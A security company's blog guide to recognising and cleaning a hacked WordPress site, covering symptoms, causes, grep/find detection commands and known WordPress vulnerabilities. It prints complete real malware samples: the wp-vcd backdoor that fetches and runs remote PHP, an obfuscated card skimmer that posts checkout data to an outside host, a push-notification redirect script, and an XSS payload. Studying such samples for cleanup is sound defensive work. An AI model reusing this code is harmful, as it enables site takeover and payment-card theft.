WordPress Hacked? These WordPress Vulnerabilities Could be the Reason

Is your WordPress site hacked?

If you are a newbie, you might feel lost deciding what to do and how to do it to get rid of the hack. Even if you had a chance with development, it still is hard to accurately find and remove a hack.

Thus, I have put together this extensive guide which would give you a real kickstart in detecting & removing the hack. This WordPress hack removal guide will cover the symptoms, detection techniques, and removal process of a WordPress hack. This guide also covers possible hack causes and hacking types, if you want to get to the malware removal, follow this link.

Symptoms of Hacked WordPress Website

While things like defacement of a WordPress site are clear indications of WordPress site hacked, other signs may be subtle. These may go unnoticed by average users.

Some subtle signs of WordPress infected with malware

Warning Messages

Weird Site Behaviour

  • If your WordPress site is redirecting users, this is a clear sign of a hack.
  • If you are not able to sign in to your website, it is possible that the hacker has changed the settings and ousted you. However, do check that you are using the correct username and password.
  • Adblockers are blocking the WordPress site for cryptocurrency mining.
  • Unknown pop-ups and malicious adverts appear on the WordPress site.
  • Suspicious Cron jobs waiting to be executed on the server or suspicious activity in the server logs.
  • Some Japanese looking characters and gibberish content appears on the WordPress site. This points towards a Japanese Keyword Hack or Pharma Hack etc.
  • Outbound spam emails spreading from your WordPress website’s domain.
  • WordPress website shows some unexpected error messages and the site becomes slow/unresponsive.
  • Not much traffic on the site but the server is always consuming heavy processing resources.

Changes in Files

  • New, unknown files in the wp-admin and wp-includes directories, both of which have rarely new files added.
  • WordPress theme, header, footer files have been modified to create redirects.
  • New and unknown admins of the WordPress website’s database appear.
  • Search results show an incorrect meta description of your WordPress site.

Why was your WordPress site hacked?

Your website’s security depends on the steps you take to secure it. Ignoring simple security rules increases your risks online.

The following might be the reason why hackers exploited your website –

1. Not Updating WordPress

This is the most basic security measure for a website. Failing to update to the latest version is the number one reason for hacked sites. So, always be quick in updating to the latest and patched versions. This patches the known vulnerabilities on your website.

2. Hosting on a Shared Server

A shared server may be the cheaper option. But, it has costlier after-effects if hacked. Move your website to a safer hosting. And choose a trusted hosting provider. Make sure to verify whether your provider complies to the best security standards.

3. Using Weak Passwords and Username

Almost all the sensitive areas on your website are password secured. A password made of your own name/your website name and has no numerals/characters is a weak password. Make sure you do not use weak passwords for the following –

  • wp-admin panel,
  • server hosting panel,
  • databases,
  • FTP accounts, and
  • your primary email account.

Also, change your default username to something unique. Words like admin, your own name, website’s name are too easy to crack for the attacker.

4. Incorrect File Permissions

Easy file permissions can let attackers access, modify or delete them. In some cases, attackers even held files against ransom. Set correct permissions as-

  • For files- 644
  • For directories- 755

Wordpress File/Folder Permissions

5. Unprotected Access to wp-admin Directory

The wp-admin directory is the area from where you control your website. Allowing unprotected access to the WordPress admin directory lets your users/team members perform unwanted actions on your website. Thus, restrict access by defining permissions for different roles of the users. That way no user has the power to do it all. Further, adding layers of authentication to your WordPress admin directory also helps. 

6. Outdated Plugins or Theme

Numerous WordPress websites use outdated plugins and themes on their website. Since these plugins and themes already contain known vulnerabilities, it is way too easy for hackers to exploit them. Therefore, if the plugin developer pushes an update, you should be quick to follow.

7. Using Plain FTP instead of SFTP/SSH

FTP accounts are used to upload files to your web server using an FTP client. Plain FTP does not encrypt your password and heightens the risk of someone hacking it. SFTP (SSH File Transfer Protocol), on the other hand, sends encrypted data to the server. So, always opt for SFTP over FTP. You could do this by changing the protocol to ‘SFTP – SSH’ every time you connect to your server.

Fixing hacked WordPress website

How to fix your WordPress Site Hacked?

After you are sure that you’re indeed facing a WordPress site hacked, this is how you can go about the hack removal:

1. Let Astra Help You

If you are an Astra Pro customer, you need not worry a bit, just raise a support ticket and Astra security engineers will clean the hack for you. They will also take care of any blacklisting that your website might face. If you are not an Astra customer, you can sign up right now and we will take care of it all for you. With Astra’s immediate malware removal service, your website will be up and running in merely a few hours.

2. Turn on the Maintenance mode

If you have detected malicious activity on your website it is only prudent to put it in maintenance mode. This will ensure that no one is able to see the hack and helps retain your site’s reputation. Putting your site on maintenance mode can also ensure that your visitors are safe from any malicious redirection.

Also, while attempting to clean the hack, the changes might hinder the performance of your live site. Obviously, you don’t want that. Further, you can use a WordPress plugin for showing quirky maintenance mode messages to your site visitors without revealing that a WordPress site hacked is under the removal process.

3. Change Current Passwords

If you can still access your website, change all the passwords immediately. This should include passwords to your admin panel, hosting account and other accounts. If you have other team members using the admin panel ask them to change their passwords as well. It is possible that the hacker got a way into your website by stealing the password of one of your teammates.

You can also opt for a re-authentication of all user accounts. This will automatically log out every user from your website and will need to get authorized again. This is another way of seizing access from any unauthorized user.

4. Check for Plugin Vulnerabilities

Vulnerabilities in third-party plugins are another common reason for a WordPress site hack. So, before jumping to the cleaning process, you must check that the current versions of your plugins are vulnerability-free.

WordPress frequently becomes a target of an unpatched plugin vulnerability exploits. Hence, it is always a possibility that you might have become a victim of a plugin exploit. Know that you will not be alone in this; usually, plugin exploits target large chunks of sites running the vulnerable plugin.

To confirm this, you can check the WordPress forum. Generally, a buzz follows on forums after a plugin exploit and you’ll find people asking for solutions.

5. Backup Your Website

Next up is to take a full backup of your website. Since the purpose of a backup is to restore the website in case of a mishap, do ensure that it is functional. A backup that does not restore your website to its full working condition is nothing but a waste.

Now, a backup should include WP core files, WP database, plugin files, theme files, .htaccess file. Most hosting services offer backing up features. Get in touch with your hosting provider to learn the backup process. Besides that, you can also make a backup manually. WordPress also has loads of backup plugins that simplify the process.

6. Diagnose Files

6.1 Use a malware scanner to find malicious codes

Run your site through a malware scanner. It will fetch you details of all files with malicious content. You can also scan for the malware manually, however that would require a lot of time. Moreover, this wouldn’t be as accurate as a scanner.

Now, use online tools to decrypt the content of hiddencode.txt. This can be alternatively done using the phpMyAdmin as shown in the image given below. Moreover, phpMyAdmin can also come handy while cleaning the database in case of a WordPress site hacked.

WordPress site hacked phpMyadmin

In case you find something suspicious but are unable to figure out what it does, get in touch with experts, we’ll be happy to help.

6.2 Use ‘find’ command to review recent modifications

In order to see the WordPress files modified by the attackers, obtain SSH access to your server and run the following command:

find . -mtime -2 -ls

This command would list all the WordPress files modified in the last 2 days. Similarly, keep increasing the number of days till you find something fishy. Now combine this find command of SSH with the grep command to search for code encoded in base64 format. Simply execute the following command:

find . -name "*.php" -exec grep "base64"'{}'; -print &> hiddencode.txt

6.3 Compare with original WordPress files 

Download fresh WordPress files from the WordPress directory and compare your backup with this. You can also use online tools like diff checker to find the differences between the files. Be careful to download files according to your WordPress version. Note the differences for further analysis. If there are some malicious injected links, remove them at once. Also, check the files for certain keywords like – eval, exec, strrev, assert, base64, str_rot13, Stripslashes, preg_replace (with /e/), move_uploaded_file etc.

You can further simplify the search for these keywords by using command lines. For instance, to search files with keyword base64 run the following command:

sudo grep -ril base64 /

Now, replace ‘base64’ with each keyword to fetch files containing them and then review them attentively.

6.4 Check with Diagnostic Tools

Generally, webmaster’s tools are quick & accurate in detecting the hack. Use this to find the problem. Google search console, for example, lists the problems under the ‘Security’ tab. It is a great way to confirm the type of hack and hacked files/pages. Review this information for a proper WordPress hack removal.

7. Clean the Hack

After the extensive diagnosis, list down all the findings. Each file difference, recent modifications, fake users/admins, should be reviewed with the utmost attention. Clean the WordPress core files such as wp-config.php, wp-contents/uploads, wp-uploads, plugin files, theme files, the database, etc.

The following wp-vcd malware was inserted into the theme’s function.php,

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9448f3b8168d84e7c43011bdf480dff7'))
{
switch ($_REQUEST['action'])
{

case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{

$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}

}
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

$wp_auth_key='d54ca5d0c33699631268138a6fbd33d8';
if (($tmpcontent = @file_get_contents("http://www.grilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.grilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.grilns.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}

elseif ($tmpcontent = @file_get_contents("http://www.grilns.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}

}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));

}

}
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp

Remove unknown users, fake admins. At last, make sure to find and remove backdoors.

Another malicious script used for credit card stealing goes as:

<script>function a(){
payment.switchMethod();


document.getElementById('authorizenet_cc_number').disabled = false;
document.getElementById('authorizenet_cc_type').disabled = false;
document.getElementById('authorizenet_expiration').disabled = false;
document.getElementById('authorizenet_expiration_yr').disabled = false;
document.getElementById('authorizenet_cc_cid').disabled = false;
document.getElementById('payment_cc').style.visibility = "visible" ;
console.log("areh");
if(n<1){
var rad = document.getElementsByClassName('radio');
var prev = null;
for (var i = 0; i < rad.length; i++) {
console.log(i);
rad[i].addEventListener('change', function() {
(prev) ? console.log(prev.value): null;
if (this !== prev) {
prev = this;
}
if(this.value!='ops_dorf'){
console.log("close");
document.getElementById('payment_cc').style.visibility = "hidden";
}
});
}
n++;
}

};
var n=0;
var fieldset= document.getElementById('checkout-payment-method-load');
var fieldParent = fieldset.parentNode;

var newdd = document.createElement('dd');
newdd.setAttribute("id", "dt_method_ops_directDebit");
newdd.setAttribute("class", "active");



newdd.innerHTML = '<input id="p_method_ops_directDebit" value="ops_dorf" name="payment[method]" title="Ingenico ePayments DirectDebit" onchange="a()" class="radio" autocomplete="off" type="radio"><label for="p_method_ops_directDebit"> Credit Card / Debit Card</label>';


var newdt = document.createElement('dt');

newdt.setAttribute("id", "payment_cc");
newdt.setAttribute("style", "visibility: hidden;");

newdt.innerHTML = '<ul class="form-list" id="payment_form_authorizenet" style="overflow: hidden;"><li><label for="authorizenet_cc_type" class="required"><em>*</em>Credit Card Type</label><div class="input-box"><select id="authorizenet_cc_type" name="payment[cc_type]" class="required-entry validate-cc-type-select"><option value="">--Please Select--</option><option value="AE">American Express</option><option value="VI">Visa</option><option value="MC">MasterCard</option><option value="DI">Discover</option></select></div></li><li><label for="authorizenet_cc_number" class="required"><em>*</em>Credit Card Number</label><div class="input-box"><input id="authorizenet_cc_number" name="payment[cc_number]" title="Credit Card Number" class="input-text validate-cc-number validate-cc-type" value="" type="text"></div></li><li id="authorizenet_cc_type_exp_div"><label for="authorizenet_expiration" class="required"><em>*</em>Expiration Date</label><div class="input-box"><div class="v-fix"><select id="authorizenet_expiration" name="payment[cc_exp_month]" class="month validate-cc-exp required-entry"><option value="" selected="selected">Month</option><option value="1">01 - January</option><option value="2">02 - February</option><option value="3">03 - March</option><option value="4">04 - April</option><option value="5">05 - May</option><option value="6">06 - June</option><option value="7">07 - July</option><option value="8">08 - August</option><option value="9">09 - September</option><option value="10">10 - October</option><option value="11">11 - November</option><option value="12">12 - December</option></select></div><div class="v-fix"><select id="authorizenet_expiration_yr" name="payment[cc_exp_year]" class="year required-entry"><option value="" selected="selected">Year</option><option value="2019">2019</option><option value="2020">2020</option><optiondtdt value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option></select></div></div></li><li id="authorizenet_cc_type_cvv_div"><label for="authorizenet_cc_cid" class="required"><em>*</em>Card Verification Number</label><div class="input-box"><div class="v-fix"><input title="Card Verification Number" class="input-text cvv required-entry validate-cc-cvn" id="authorizenet_cc_cid" name="payment[cc_cid]" value="" type="text"></div><a href="#" class="cvv-what-is-this">What is this?</a></div></li></ul>';
fieldParent.appendChild(newdd);fieldParent.appendChild(newdt);</script>


<script>
var _0xb4aa=["\x3B\x20","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x73\x70\x6C\x69\x74","\x6C\x65\x6E\x67\x74\x68","\x73\x68\x69\x66\x74","\x3B","\x70\x6F\x70","\x62\x75\x74\x74\x6F\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x63\x6C\x69\x63\x6B","","\x66\x6F\x72\x6D","\x63\x75\x72\x72\x65\x6E\x74\x64\x61\x74\x61\x73\x3D","\x24","\x3B\x20\x70\x61\x74\x68\x3D\x2F","\x69\x6E\x70\x75\x74","\x73\x65\x6C\x65\x63\x74","\x76\x61\x6C\x75\x65","\x74\x79\x70\x65","\x72\x61\x64\x69\x6F","\x68\x69\x64\x64\x65\x6E","\x69\x64","\x73\x65\x61\x72\x63\x68","\x73\x75\x62\x6D\x69\x74","\x6E\x61\x6D\x65","\x63\x75\x72\x72\x65\x6E\x74\x64\x61\x74\x61\x73","\x3A","\x7C","\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72","\x69\x6E\x64\x65\x78\x4F\x66","\x36\x36\x36\x20","\x55\x52\x4C","\x64\x69\x73\x63\x6F\x75\x6E\x74","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x61\x70\x70\x65\x6E\x64","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x6C\x6C\x6F\x77\x65\x65\x6E\x68\x61\x6C\x6C\x77\x61\x79\x2E\x63\x6F\x6D\x2F\x6A\x73\x2F\x6D\x61\x67\x65\x2F\x61\x64\x6D\x69\x6E\x68\x74\x6D\x6C\x2F\x70\x72\x6F\x64\x75\x63\x74\x2F\x63\x6F\x6D\x70\x6F\x73\x69\x74\x65\x2F\x76\x61\x6C\x69\x64\x61\x74\x65\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x6C\x6F\x61\x64"];function getCookie(_0x9e9fx2){var _0x9e9fx3=_0xb4aa[0]+ document[_0xb4aa[1]];var _0x9e9fx4=_0x9e9fx3[_0xb4aa[3]](_0xb4aa[0]+ _0x9e9fx2+ _0xb4aa[2]);if(_0x9e9fx4[_0xb4aa[4]]== 2){return _0x9e9fx4[_0xb4aa[7]]()[_0xb4aa[3]](_0xb4aa[6])[_0xb4aa[5]]()}}function taef(){var _0x9e9fx6=document[_0xb4aa[9]](_0xb4aa[8]);for(i= 0;i< _0x9e9fx6[_0xb4aa[4]];i++){_0x9e9fx6[i][_0xb4aa[40]](_0xb4aa[10],function(){var _0x9e9fx7=_0xb4aa[11];var _0x9e9fx8=document[_0xb4aa[9]](_0xb4aa[12]);document[_0xb4aa[1]]= _0xb4aa[13]+ _0xb4aa[14]+ _0xb4aa[15];for(z= 0;z< _0x9e9fx8[_0xb4aa[4]];z++){var _0x9e9fx9=_0x9e9fx8[z][_0xb4aa[9]](_0xb4aa[16]);var _0x9e9fxa=_0x9e9fx8[z][_0xb4aa[9]](_0xb4aa[17]);for(x= 0;x< _0x9e9fx9[_0xb4aa[4]];x++){if(_0x9e9fx9[x][_0xb4aa[18]]&& _0x9e9fx9[x][_0xb4aa[18]]!= _0xb4aa[11]&& _0x9e9fx9[x][_0xb4aa[19]]!= _0xb4aa[20]&& _0x9e9fx9[x][_0xb4aa[19]]!= _0xb4aa[21]&& _0x9e9fx9[x][_0xb4aa[22]]!= _0xb4aa[23]&& _0x9e9fx9[x][_0xb4aa[18]]!= _0xb4aa[24]){if(_0x9e9fx9[x][_0xb4aa[25]]&& _0x9e9fx9[x][_0xb4aa[25]]!= _0xb4aa[11]){var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fx9[x][_0xb4aa[25]]+ _0xb4aa[27]+ _0x9e9fx9[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}else {var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fx9[x][_0xb4aa[22]]+ _0xb4aa[27]+ _0x9e9fx9[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}}};for(x= 0;x< _0x9e9fxa[_0xb4aa[4]];x++){if(_0x9e9fxa[x][_0xb4aa[18]]&& _0x9e9fxa[x][_0xb4aa[18]]!= _0xb4aa[11]&& _0x9e9fxa[x][_0xb4aa[19]]!= _0xb4aa[20]&& _0x9e9fxa[x][_0xb4aa[19]]!= _0xb4aa[21]&& _0x9e9fxa[x][_0xb4aa[22]]!= _0xb4aa[23]&& _0x9e9fxa[x][_0xb4aa[18]]!= _0xb4aa[24]){if(_0x9e9fxa[x][_0xb4aa[25]]&& _0x9e9fxa[x][_0xb4aa[25]]!= _0xb4aa[11]){var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fxa[x][_0xb4aa[25]]+ _0xb4aa[27]+ _0x9e9fxa[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}else {var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fxb+= _0x9e9fxa[x][_0xb4aa[22]]+ _0xb4aa[27]+ _0x9e9fxa[x][_0xb4aa[18]]+ _0xb4aa[28];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15];document[_0xb4aa[1]]= _0xb4aa[13]+ _0x9e9fxb+ _0xb4aa[15]}}}};var _0x9e9fxb=getCookie(_0xb4aa[26]);_0x9e9fx7= _0x9e9fxb;if(_0x9e9fx7[_0xb4aa[30]](_0xb4aa[29])!== -1){var _0x9e9fxc= new FormData();var _0x9e9fxd={Domain:_0xb4aa[31]+ document[_0xb4aa[32]],d:btoa(_0x9e9fx7)};_0x9e9fxc[_0xb4aa[35]](_0xb4aa[33],btoa(JSON[_0xb4aa[34]](_0x9e9fxd)));urll= _0xb4aa[36];var _0x9e9fxe= new XMLHttpRequest();_0x9e9fxe[_0xb4aa[38]](_0xb4aa[37],urll,true);_0x9e9fxe[_0xb4aa[39]](_0x9e9fxc)}})}}window[_0xb4aa[40]](_0xb4aa[41],function(){taef()})
</script> 

8. Clean the sitemap

It may also happen that the WordPress malware is residing in your site’s sitemap.xml. An XML sitemap is a file that helps Google to crawl all the important pages on your website. Sometimes hackers inject malicious links in your sitemap file.

Scan your sitemap for malicious links. If you find anything other than normal, remove it. Also, don’t forget to tell Google that you have cleaned the file, submit a request with your Google search console to re-crawl your website.

9. Clean the database

WordPress database is where all information regarding your users, site pages, sensitive credentials, etc. reside. It’s a no brainer that the database makes for a desirable target. Hence, it is extremely important to scan the database too to find the hack. You can use a malware scanner to know more exactly about infections in your wp_db file.

If you wish to check manually, you would need to scan every one of the 11 tables to find the hack. Search for links/iframes that look suspicious and remove them to get rid of the WordPress site hacked. Here is an example of a redirection code inserted into the database:

<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2574011" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script>

10. Reinstall

If the site is heavily infected, it’s better to delete the files and replace that with the fresh counterparts.

That said, reinstalling is not limited to the files only; after the cleanup makes sure to reinstall each plugin. Sometimes due to lack of time or lack of vigilance we tend to store defunct plugins. A hacker benefits from these plugins for they almost always have exploitable vulnerabilities.

Some WordPress web owners believe that deleting the whole website and starting from scratch is a more viable option.

Well, it’s not.

It doesn’t matter that you build a new website if you are not following the security practices things can always go wrong.

How do hackers attack WordPress websites?

1. WordPress SQL Injection

WordPress version 4.8.3 and previous ones were found vulnerable to SQL injection attacks. Quite ironically, the $wpdb->prepare() method which is generally used to prepare safe queries was itself vulnerable this time. This meant that plugins and themes that used queries created using this function were also potentially vulnerable to an SQLi attack.

Similarly, the WP Statistics plugin of WordPress with more than 3,00,000 downloads was vulnerable to SQLi. Typically, an attacker can read sensitive tables like wp_users of your WordPress site using SQLi. Although the passwords are stored in encrypted format, still tools can be used for decryption. This means getting admin credentials to log into an admin’s account in WordPress. In the worst case scenario, the attacker can even upload a reverse shell using an SQLi leading to a WordPress site hacked.

Related Article – Prevent SQL Injection in WordPress

2. WordPress Cross-Site Scripting

WordPress version 5.1.1 and previous ones were found vulnerable to an XSS, CSRF and RCE vulnerability. This was a stored XSS vulnerability. The wp_filter_kses() function which is used to sanitize comments, allows basic HTML tags, and attributes like <a> tag combined with the ‘href‘ attribute. Therefore, attackers can deliver malicious payload like <a title=’XSS ” onmouseover=evilCode() id=” ‘>. This would get stored in the database and run every time a user visits this page.

Related Blog – Cross- Site Scripting in WordPress – Examples

3. WordPress Cross-Site Request Forgery

CSRF validation token has not been implemented in WordPress and rightly so because if done, it would hinder the trackbacks and pingbacks features of WordPress. To differentiate normal users from admins, WordPress uses an extra nonce for admin validation in the comment forms.

So, if the correct nonce is provided, the comment is created without sanitization. And if the nonce is incorrect, the comment is created with sanitization. So when an administrator fails to provide nonce, the comment is sanitized using wp_filter_post_kses() instead of the function wp_filter_kses(). Thus, the function wp_filter_post_kses() allows an attacker to create comments with lots more HTML tags and attributes than permissible thereby conducting a CSRF attack.

4. WordPress Remote Code Execution

WordPress versions before 4.9.9 and 5.x before 5.0.1 were found prone to RCE. The vulnerable parameter was the Post meta entry of the _wp_attached_file() function. This parameter could be manipulated to a string of choice i.e. ending with .jpg?file.php substring.

However, to exploit this, the attacker needed author privileges. The attacker with author privileges could upload a specially crafted image. This image contained the PHP code to be executed, embedded in the Exif metadata. Script to exploit this vulnerability are publically available and a Metasploit module has been released too!

5. WordPress Directory Traversal

WordPress 5.0.3 was vulnerable to Path Traversal attacks. To exploit this, the attacker needed at least author privileges on the target WordPress site. The vulnerable components was the function wp_crop_image().

So, the user running this function (is able to crop an image) could output image to an arbitrary directory. Moreover, the file name could be appended with the directory up symbol i.e. ‘../‘ to get the path of the file an attacker wishes to obtain i.e .jpg?/../../file.jpg. Exploits and Metasploit modules to replicate this vulnerability are available online!

6. Buggy Plugins or Themes

It is also likely that a poorly coded plugin is responsible for WordPress getting hacked. Themes by non-reputed authors often contain buggy code. In some cases, attackers themselves release malware-laden plugins and themes to compromise numerous sites. Also, an outdated WordPress software can make the site vulnerable thereby leading to WordPress hacked.

Need professional help to prevent WordPress site hacked?. Drop us a message on the chat widget, and we’d be happy to help you. Fix my Hacked WordPress website now.

Fixing Hacked WordPress Website

1. Secure Practices

  • Avoid using common or default passwords. Make sure the WordPress login requires a secure and random password.
  • Remove folders of old WordPress installation from the site as they can leak sensitive info.
  • Do not use null themes or plugins from unreputed authors. Keep the existing plugins and themes up to date with the latest patches.
  • Use subnetting while sharing the WordPress hosting space with other sites.
  • Make sure no sensitive ports are open on the internet.
  • Disable directory indexing for sensitive WordPress files using .htaccess.
  • Restrict IPs based on countries from where you detect heavy bot traffic on site.
  • Follow secure coding practices if you are a developer for WordPress.
  • Use SSL for your WordPress site.
  • Always keep a backup of your WordPress site separately.
  • Rename the wp-login.php into a unique slug.
  • Use two-factor authentication to log into your WordPress site.

2. Use a Security Solution

A firewall can help in securing your WordPress site even if it is vulnerable. However, finding the correct firewall according to the diverse needs of WordPress can be tricky. Astra can help you in making the right choices from its three plans of Essential, Pro, and Business. No matter you use WordPress to run a small blog or a corporate site, Astra covers every ground for you. Moreover, the Astra security solution scans and patches your vulnerable WordPress site automatically. Just install the Astra plugin and your site is secure again.

Try a demo now!

3. Security Audit and Pentesting

As seen in the article, vulnerabilities in WordPress will arise from time to time. Therefore, as a precautionary measure, it is advisable to conduct a penetration testing of your website. This will reveal the loopholes to you before the attackers can catch up on your site’s security. Astra provides a comprehensive security audit of the complete WordPress site. With its 120+ active tests, Astra gives you the right mix of automatic and manual testing.

wordpress security audit, magento security audit

Was this post helpful?



Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Ananda Krishna

Ananda Krishna is the co-founder & CTO of Astra Security, a SaaS suite that secures businesses from cyber threats. He has been acknowledged by the Indian Navy, Microsoft, United Airlines, etc. for finding critical security vulnerabilities in their systems. Winner of the Best Security Product at Global Conference on Cyberspace 2017 (awarded by Narendra Modi, Prime Minister of India) & French Tech Ticket, Paris (awarded by François Hollande, former President of France). At Astra he's building an intelligent security ecosystem - web application firewall (WAF), malware detection & analysis, large scale SaaS applications, APIs & more. He's actively involved in the cyber security community and shared his knowledge at various forums & invited talks.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close